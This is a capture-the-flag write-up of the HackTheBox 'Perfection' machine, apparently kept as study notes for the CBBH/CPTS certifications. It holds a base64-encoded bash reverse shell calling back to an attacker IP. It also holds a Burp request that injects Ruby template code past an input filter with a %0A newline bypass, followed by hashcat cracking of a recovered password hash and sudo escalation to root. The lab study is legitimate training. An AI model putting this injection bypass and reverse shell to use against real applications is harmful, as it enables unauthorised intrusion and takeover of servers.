Published on

HTB: Perfection Sanity Check | CBBH - CPTS

Authors

These notes serve primarily as a validation and reference tool for HTB Academy Modules, documenting the insights acquired from HTB machines/boxes that have contributed to my progression in the CBBH & CPTS path from Hackthebox. They are not designed as instructional guides, but they do contain spoilers and insights as you advance further.

Bank.png

Sanity Checklist

Hackthebox Academy subscription is required to view the information in each module.

TopicModule
✅ EnumerationGETTING STARTED
--- Did you enumerate everything?
✅ NmapSERVICE ENUMERATION
--- Have you done a nmap scan of all ports?
✅ Page FuzzingATTACKING WEB APPLICATIONS WITH FFUF
--- Have you discovered all pages available?
✅ Vhost FuzzingATTACKING WEB APPLICATIONS WITH FFUF
--- Any subdomains available?
✅ Directory FuzzingATTACKING WEB APPLICATIONS WITH FFUF
--- Any other directories?
✅ Burp IntruderUSING WEB PROXIES
--- Have you intercepted all possible requests?
✅ Server-side AttacksINTRO to SSI
--- Have you discovered a way to bypass the "Malicious input blocked"
✅ Shells & PayloadsREVERSE SHELLS
--- Have you found the right payload for a reverse shell?
✅ Cracking Psw with HashcatDICTIONARY ATTACK
--- Did you find susans mail for cracking?
✅ Privilege EscalationSUDO


⚠️ Contains spoilers ahead that assist beyond the Sanity Check above ⚠️



Recon

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 80e479e85928df952dad574a4604ea70 (ECDSA)
|   256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqNwnyqGqYHNSIjQnv7hRU0UC9Q4oB4g9Pfzuj2qcG4
80/tcp open  http    syn-ack nginx
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Information Disclosure

<!-- Footer -->
 <footer>
<p class="copyright">Copyright Secure Student Tools. All rights reserved<br><b>Powered by WEBrick 1.7.0</b></p>
</footer>

Burp Interception

perfection_site

Base64 encoded

╭─kali at kali in ~
╰─○ base64 <<< "bash -i >& /dev/tcp/10.10.14.2/1234 0>&1" | sed 's/\+/\%2b/'
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=

Payload Injection - Base64 - Reverse Shell

Burp repeater request. Important note: %0A is the new line bypass, which allows anything to be injected after it, including a reverse shell

category1=History%0A<%25%3dsystem("echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=+|+base64+-d+|+bash");%25>&grade1=1&weight1=100&category2=00&grade2=0&weight2=0&category3=0&grade3=0&weight3=0&category4=0&grade4=0&weight4=0&category5=0&grade5=0&weight5=0cd 

Footdhold - Susan

susan@perfection:~$ id
id
uid=1001(susan) gid=1001(susan) groups=1001(susan), 27(sudo)
susan@perfection:~$

Susan has sudo but requires password

Migration - sqlite database

Holding password hashes for several users

perfection sql hashes

Hashcat bruteforcing

╭─kali at kali in ~
╰─○ hashcat -m 1400 susan_hash.txt -a 3 'susan_nasus_?d?d?d?d?d?d?d?d?d'
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux) - Platform 
=========================================================
* Device #1: gameboy

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
* Raw-Hash

abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Wed Jul 17 00:34:36 2024 (22 secs)
Time.Estimated...: Wed Jul 17 00:34:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14500.5 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 324567040/1000000000 (32.46%)
Rejected.........: 0/324567040 (0.00%)
Restore.Point....: 324550656/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_354540610 -> susan_nasus_700440610

Started: Wed Jul 17 00:34:28 2024
Stopped: Wed Jul 17 00:34:27 2024

Root flag.txt

susan@perfection:~$ sudo su
[sudo] password for susan: 
root@perfection:/home/susan# cd /root
root@perfection:~# ls
root.txt
root@perfection:~# cat root.txt
f572e32a1023520404b1ab773c8ea534
root@perfection:~#

Important Bypass

The \n url encoded to %0A was the important bypass for a payload injection with a reverese shell.